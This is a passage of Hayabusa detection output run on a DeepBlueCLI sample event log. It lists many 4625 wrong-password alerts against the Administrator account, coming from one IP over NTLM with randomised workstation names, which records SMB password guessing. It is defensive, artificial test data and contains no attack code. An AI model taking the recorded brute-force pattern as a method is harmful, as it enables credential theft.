NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fyyu0x6I29R2J10Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8lCe1shqSs0xNwAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ipZAMvm56d5mE9Fc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XX9N7jodTuEYBCSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h5DBFGpzfJJ7gYV1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ3qTwcWkXJDuXDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOfkvLSo2HuhMtvk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y9DQUhPQHvvwAO0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yao1JM0tSFv5IHnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXGm63wiZz3ZYFb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: izvPgZCO2GRVLhId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iI9zO2o7jd922pfK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnAGy86My6hVwt4J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhFTzONSVEziRtgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdEv4ooC8AApqU1T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxFGRBKVK732Aeu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITg8QH90LKkAQMLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8YKCN2uxmJtYxdW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lcVIqrTQbNLFW7Cr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: taZx68l1ci0i2XB0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Jjy0gZhZCc9dVGd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S1DxOWcNytmxHfxl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGRFWos3MJeQ0oAr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I3YXVTiQAGbf57TH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eWNsBwoGd36krY2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HIobpWCoOHdD76lL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W91ruUEdXwRcMxVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6PEs7fp97cYFf4vx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQelUX0kwLfpJnr0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t88CBspQqbiO1IPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zELW2Upo3jRCIqJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfcyJGLYmu93JBIL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3t2nKPZHZvcXM3QA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oiDRonqdEM2YJvz9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wJPF4GUypkDkTz56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cd5YRVIoXx8LoYpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H49I2Xp2Gz1Jj0Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMSWWzskoRfYBGny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLm2PolKMBsYkPnN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZjHWhG2rXzYWskz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FOZzVedHYODB5Yvd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVaRybjI4HdZV0Zs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tTcl30MvvycjFcQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVZqbCr9EwmV4gNE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zVwhii0TVmCkpDI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Tx04CPPVa6WYY9G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gHyefIGqhIIy3ZI9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wrietoh4wgXcEvNd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9WW0Y5PW2JfCCdyR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmXsMJ0ELK4qiNY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeftUqriSoxCgmDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60JE9WQQ8N00j65B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0rt2yVAEH6V4IIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pay98C2Gr1di7qQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8TyPDYm9QCAmqj7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Dw3iK7DQMVXy8LW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BMuO0QEkxpKRv4Vl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaHECaQDXCXQc9Xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ewXT2VcARiaNLIxJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGSTrm4AOojs7So0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wVTBSk0Q65LkaTqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NjFN51w3T4VwuWa5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KG7a88h48ZEyOuYw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ksKuTSGukc5em3B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPEMcGV6ZR92sWNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iBQ6sKrRjb7BsySN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gDFnG1gv7jOeIQ0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdFKkcNpkfAScnkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IAYbV4ioewwkZSmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bQ2Dxd6nlgSXJpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: havLyoVCfdCqzrqO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b2vZLhz19pXrq9iE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4TSN93DrSWb1ah4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QwFyrxiceLRTD9rI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARbqo84Mr5T3ltRg : IP Address: 192.168.198.149 : AuthPackage: 